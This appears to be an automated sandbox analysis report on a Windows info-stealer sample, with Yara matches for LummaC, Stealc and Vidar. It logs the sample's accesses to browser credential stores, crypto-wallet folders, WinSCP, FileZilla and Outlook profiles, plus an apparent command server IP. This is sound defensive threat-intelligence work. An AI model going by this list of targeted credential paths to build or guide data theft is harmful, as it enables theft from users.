Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

3_2_00417420

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_004172F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_004174D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 29_2_6CAC1BC0 memset,GetVersionExA,

29_2_6CAC1BC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: file.exe, 00000000.00000002.1244342672.0000000001641000.00000004.00000020.00020000.00000000.sdmp, userFBKFCFBFID.exe, 00000012.00000002.1377947298.0000000001212000.00000004.00000020.00020000.00000000.sdmp, userIEHDAFHDHC.exe, 0000001B.00000002.1381565125.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, DHCGHDHIDH.exe, 00000027.00000002.1880887978.0000000001452000.00000004.00000020.00020000.00000000.sdmp, HDAFIIDAKJ.exe, 0000002A.00000002.1890730965.0000000000853000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Amcache.hve.33.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.33.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.33.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: file.exe, 00000000.00000002.1244342672.0000000001641000.00000004.00000020.00020000.00000000.sdmp, userFBKFCFBFID.exe, 00000012.00000002.1377947298.0000000001212000.00000004.00000020.00020000.00000000.sdmp, userIEHDAFHDHC.exe, 0000001B.00000002.1381565125.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, DHCGHDHIDH.exe, 00000027.00000002.1880887978.0000000001452000.00000004.00000020.00020000.00000000.sdmp, HDAFIIDAKJ.exe, 0000002A.00000002.1890730965.0000000000853000.00000004.00000020.00020000.00000000.sdmp, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr	Binary or memory string: AVP.exe
Source: Amcache.hve.33.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000EDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.33.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 29.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.userIEHDAFHDHC.exe.38b5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.userIEHDAFHDHC.exe.38b5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3916, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: passphrase.json
Source: RegAsm.exe	String found in binary or memory: \jaxx\Local Storage\
Source: RegAsm.exe	String found in binary or memory: \Ethereum\
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe, 00000003.00000002.1384359989.0000000001451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 147.45.44.104rontdesk\AppData\Roaming\Binance\.finger-print.fp
Source: RegAsm.exe	String found in binary or memory: Ethereum
Source: RegAsm.exe	String found in binary or memory: file__0.localstorage
Source: RegAsm.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: RegAsm.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3916, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000003.00000002.1384359989.000000000140A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 29.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.userIEHDAFHDHC.exe.38b5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.userIEHDAFHDHC.exe.38b5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: userIEHDAFHDHC.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3916, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CD30C40 sqlite3_bind_zeroblob,	3_2_6CD30C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CD30D60 sqlite3_bind_parameter_name,	3_2_6CD30D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CC58EA0 sqlite3_clear_bindings,	3_2_6CC58EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6CD30B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	3_2_6CD30B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC6410 bind,WSAGetLastError,	29_2_6CAC6410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_6CAC60B0 listen,WSAGetLastError,	29_2_6CAC60B0

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1500787
Product:	CloudBasic
Start time:	22:54:08
Start date:	28.08.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	8e41d2107579afb2911dccffeab97f1c
SHA1:	e364f0f9b85adcb64747c8eac819a1b59b458727
SHA256:	c5c219a6512dc639b5ac5837abe4217e265f7d165159da131eb32048b0c15030
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\AAEBAFBGIDHCBFHIECFCBGHIEG	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\AEBAKJDG	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	9A809AD8B1FDDA60760BB6253358A1DB	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
C:\ProgramData\AECFCAAE	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	2D903A087A0C793BDB82F6426B1E8EFB	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
C:\ProgramData\CAFBGDHCBAEH\DHDAKF	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5	9664DAA86F8917816B588C715D97BE07	FAD9771763CD861ED8F3A57004C4B371422B7761	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
C:\ProgramData\DHCGHDHIDH.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	E377DAE8BDF40A95DB250E59842D2915	736FB820155A7511131490D243433C010889A523	549E34CD006E9805549E99590A78FBAD9D5A963CB48D841C553D5CCD40A367B1
